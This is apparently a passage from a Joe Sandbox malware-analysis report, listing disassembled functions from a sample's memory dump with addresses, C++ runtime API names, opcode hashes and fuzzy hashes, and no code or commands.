                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Concurrency::details::EmptyQueue::StructuredWork$Max_valueMin_value
                                                                • String ID:
                                                                • API String ID: 348937374-0
                                                                • Opcode ID: 52043a82d91c0c531d7f0aa650638332654ae7400ce2e9716a245f7f6f74b5a4
                                                                • Instruction ID: 2db579cd7b1309c023f635a47583861e925396d2c49d933716134b89fd50b502
                                                                • Opcode Fuzzy Hash: 52043a82d91c0c531d7f0aa650638332654ae7400ce2e9716a245f7f6f74b5a4
                                                                • Instruction Fuzzy Hash: 3AA1ED2661EB8585DAA0DB56E49036FB7A0F7C9BC4F004136EBCD87B6ADE2CD4508B40
                                                                Function 00007FF6A54D7148 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: 20f952b95b39423f2e834fb4f9d70f19447ce98c27c7846c75932ab472913a72
                                                                • Instruction ID: fe28e7bdd71dfe413ecc841b2ce5e333d430563eea951c1c2b2f8d0901af55fd
                                                                • Opcode Fuzzy Hash: 20f952b95b39423f2e834fb4f9d70f19447ce98c27c7846c75932ab472913a72
                                                                • Instruction Fuzzy Hash: 92418526B0AA4291EB15EB55E4402BC63A5FF46FA4F580132DE4DC77A6DE7CEC82C310
                                                                Function 00007FF6A54C5748 Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: 5f102a975c722a4baeed48626eb4b926815fe391fbe247a745d5d4ede05e206a
                                                                • Instruction ID: 729d89cb73d541d291d802c6a95be680af62414a637f311ba0198945b6b4acb3
                                                                • Opcode Fuzzy Hash: 5f102a975c722a4baeed48626eb4b926815fe391fbe247a745d5d4ede05e206a
                                                                • Instruction Fuzzy Hash: 92415E26A0BA4281EA15EF55E4401BC6761FF96FA4F180532DE1D87696DF7CFC86C320
                                                                Function 00007FF6A54B82A8 Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: 654737a287ff8c336bcfb59873d788543a12bafc940bcce2ca611e93a6fda962
                                                                • Instruction ID: 033bfe95b99b23ae0fc293b63382ac1f7f11c9f2f94063bb8091497a1d798b84
                                                                • Opcode Fuzzy Hash: 654737a287ff8c336bcfb59873d788543a12bafc940bcce2ca611e93a6fda962
                                                                • Instruction Fuzzy Hash: 88416E36A0AA4291EA15EF55E4401BC6761FF86F90F0A1231DE1DC7296DE3CEC42C320
                                                                Function 00007FF6A54E83D0 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo
                                                                • String ID:
                                                                • API String ID: 3215553584-0
                                                                • Opcode ID: 82ef9762d116206a9ccbb816db9741084e886a717f3aa28472a3f8edb0d32f9b
                                                                • Instruction ID: f8404488ff9a24dd150141b30a929a678e45b3058a8919a1135cafde74a7981e
                                                                • Opcode Fuzzy Hash: 82ef9762d116206a9ccbb816db9741084e886a717f3aa28472a3f8edb0d32f9b
                                                                • Instruction Fuzzy Hash: DF41322290AAC5D9EB52DF25D4142F93BA0EB47F58F498071CB8D8734AEE3D9845C311
                                                                Function 00007FF6A54C5630 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: 850366757b357ba1f3bdf3103d901588ad0ebbeae1cb3b2b79265ac9088d748a
                                                                • Instruction ID: 3a25c10f8bb387f0753d3bcc7011adf28e1576606e169eda4bfb23b05b2cfb08
                                                                • Opcode Fuzzy Hash: 850366757b357ba1f3bdf3103d901588ad0ebbeae1cb3b2b79265ac9088d748a
                                                                • Instruction Fuzzy Hash: 1E314D36A0BA4285EA05EF55E8401BD6761EF96FA0F180131DA0D876A6DF7CFC86C320
                                                                Function 00007FF6A54C52E8 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: b214aa75b3925880e37dfd82643918b82af9d5d8fae4848c120db6a7df8e30af
                                                                • Instruction ID: 3306bcc01eea131fc942c4345cdb58f877ce82d351b4be5259e5e7ec470c350e
                                                                • Opcode Fuzzy Hash: b214aa75b3925880e37dfd82643918b82af9d5d8fae4848c120db6a7df8e30af
                                                                • Instruction Fuzzy Hash: 55318025A0AA4281EB05EF55E4401BD6761EF96FA0F580132DA0DC77A5DFBCFC46C320
                                                                Function 00007FF6A54C5518 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: dd61e209954328c3efc53be8d5d4842e416a8f47be5cb8321d95453dd1f5f65a
                                                                • Instruction ID: 79d13d1d18f1a2d054c4d15749974cf0a1fb0567e435c8d2eabdfa9f7a5e1807
                                                                • Opcode Fuzzy Hash: dd61e209954328c3efc53be8d5d4842e416a8f47be5cb8321d95453dd1f5f65a
                                                                • Instruction Fuzzy Hash: 60318E25A0AA4285FA05EF55E8001BD6761FF96FA1F080532DA0DC76A9DF7CFC46C320
                                                                Function 00007FF6A54C5400 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: e73724cc9f484c6959b64651cfc36035642c7cc7c7d88766abc4696fe8a4cb7f
                                                                • Instruction ID: fd884b50a31183fc3718151cc75c2556de7eacb0997a7d14af99c95bf45abba4
                                                                • Opcode Fuzzy Hash: e73724cc9f484c6959b64651cfc36035642c7cc7c7d88766abc4696fe8a4cb7f
                                                                • Instruction Fuzzy Hash: 15314F36A0AA4281EA05EF55E4402BD6761FF96FA1F180231DA1D876A6DF7CFC46C324
                                                                Function 00007FF6A54C4E88 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: 4a7da8aed5b6b79ac28b560fab634060b8de61e66efdea0db68f532d6a9d005f
                                                                • Instruction ID: aed0cf8f8b7d386964fb65a6558d4d740e93fdcd1e13a7cababd9f460bafa725
                                                                • Opcode Fuzzy Hash: 4a7da8aed5b6b79ac28b560fab634060b8de61e66efdea0db68f532d6a9d005f
                                                                • Instruction Fuzzy Hash: E1317C25A0AA4281FB05EF56E5401B86761EF86FA5F080532DA4DC76A9DF7CFC4AC320
                                                                Function 00007FF6A54D6F18 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: 08f660a80a6bd6db7d3452848060bf96eabaf76c459d8e3d31bb2cc7a43d8b64
                                                                • Instruction ID: 823b7bbf536027184d801746c159595cb459c7467425a432af3af6d4972b8682
                                                                • Opcode Fuzzy Hash: 08f660a80a6bd6db7d3452848060bf96eabaf76c459d8e3d31bb2cc7a43d8b64
                                                                • Instruction Fuzzy Hash: F5314F26A0AA4295FF05EF55E4401B967A1FF46FA4F080536DA0D876EADE7CEC42C320
                                                                Function 00007FF6A54C4D70 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: 175a4327bf2b3b06f3d95371e1b0a11bdbe8cfea884c63090f2e2448b9f805a8
                                                                • Instruction ID: 66338913482d6f13b6e5bf8f5a6ec9c26be49f1d0976c34cf31de2913b61c857
                                                                • Opcode Fuzzy Hash: 175a4327bf2b3b06f3d95371e1b0a11bdbe8cfea884c63090f2e2448b9f805a8
                                                                • Instruction Fuzzy Hash: 5F318D25A0AA4281FA15EF56E5405B86761FF87FA1F090132DA0DC76A6DF7CFC86C320
                                                                Function 00007FF6A54D6E00 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: 1566fae3d0445a6c441ba320261657d37fc91eae55285bf6e743efda64440272
                                                                • Instruction ID: 2d349990ff90ed3106c471e596fcdc9fde85d3626037453ac6fecf6b378d8eb0
                                                                • Opcode Fuzzy Hash: 1566fae3d0445a6c441ba320261657d37fc91eae55285bf6e743efda64440272
                                                                • Instruction Fuzzy Hash: E5315236A1AA4295FF15EF95E4401B967A1EF46FA0F180132DA1DC7696DF7CEC82C320
                                                                Function 00007FF6A54C50B8 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: 8e1c69f7fe255bc03789d27f0fc7e714bcf807a62433ab12183457e2a661c027
                                                                • Instruction ID: 21b149e78b7e62d4d38c10ac45e2288778126d3dc0797c38aa8aea47bc6e99ba
                                                                • Opcode Fuzzy Hash: 8e1c69f7fe255bc03789d27f0fc7e714bcf807a62433ab12183457e2a661c027
                                                                • Instruction Fuzzy Hash: FB313E29E0AA4281EA05EF55E8441BD6761FF96FA0F480131DA0DC76A5EF7CFC46C320
                                                                Function 00007FF6A54C4FA0 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: 36efe169a6ebd8aef92053f11cca52ea8b32167d8c389a821dd7b65474c87744
                                                                • Instruction ID: be278c6296937af47b73831788cbf1679dceb130ae6d208c201f6d756ec4a7ab
                                                                • Opcode Fuzzy Hash: 36efe169a6ebd8aef92053f11cca52ea8b32167d8c389a821dd7b65474c87744
                                                                • Instruction Fuzzy Hash: 00316626A1AA4281FA15EF56E4401BD6751FF96FA1F080131DA0DC7696DF7CFC46C320
                                                                Function 00007FF6A54D7030 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: 2117a84d37158296eec2bd850f87667277ffb73284195d52f6e2d41b2ff2937d
                                                                • Instruction ID: 90f3f0f51b5e10b13ae132947c18304d72a6bbcca4c159da2eaf98dff5711e87
                                                                • Opcode Fuzzy Hash: 2117a84d37158296eec2bd850f87667277ffb73284195d52f6e2d41b2ff2937d
                                                                • Instruction Fuzzy Hash: 24315426A0AA4291EB05EF55D4402BD6791FF46FA4F080532DA4DC77D5DE7CEC42C320
                                                                Function 00007FF6A54D6AB8 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: 2732deb32a6e35dd6a2eb56c6452a49076469c3353fd504ed171353e37f136bc
                                                                • Instruction ID: 7df8a3a50c36ca0ddf9be9978908fcee55ec938b19ed96f69e6d6d85e859ea08
                                                                • Opcode Fuzzy Hash: 2732deb32a6e35dd6a2eb56c6452a49076469c3353fd504ed171353e37f136bc
                                                                • Instruction Fuzzy Hash: 37318027A0AA5291FF05EF55E4441B867A1FF86FA4F580132DA0DC76A5DE7CEC82C320
                                                                Function 00007FF6A54D69A0 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: 1239f9da964960b2540dbdd5ceb4f6c1a467ff7cef015842ba34e5ed629177e8
                                                                • Instruction ID: f24058a5b9bc64addf16ac29aa7cb643afda76a650a0453b90b704aa0ddc67ef
                                                                • Opcode Fuzzy Hash: 1239f9da964960b2540dbdd5ceb4f6c1a467ff7cef015842ba34e5ed629177e8
                                                                • Instruction Fuzzy Hash: 7B317C26A0AA4291FF05EF65E4401B867A1FF87FA0F184132DA4D877A5DE7CEC42C320
                                                                Function 00007FF6A54C4A28 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: 210c631a9135c7773bfa571deb22057c837beb874036450f135bcf1ac10e1455
                                                                • Instruction ID: d39718dea488f81b4e2468f3f44f495e89ff20ea883251d09a841d945f9fe10f
                                                                • Opcode Fuzzy Hash: 210c631a9135c7773bfa571deb22057c837beb874036450f135bcf1ac10e1455
                                                                • Instruction Fuzzy Hash: 9B31A035A0AA4284EA05EF56E5001B96761FF86FA0F090132DA0DC77A5DF7CFC46C320
                                                                Function 00007FF6A54C4C58 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
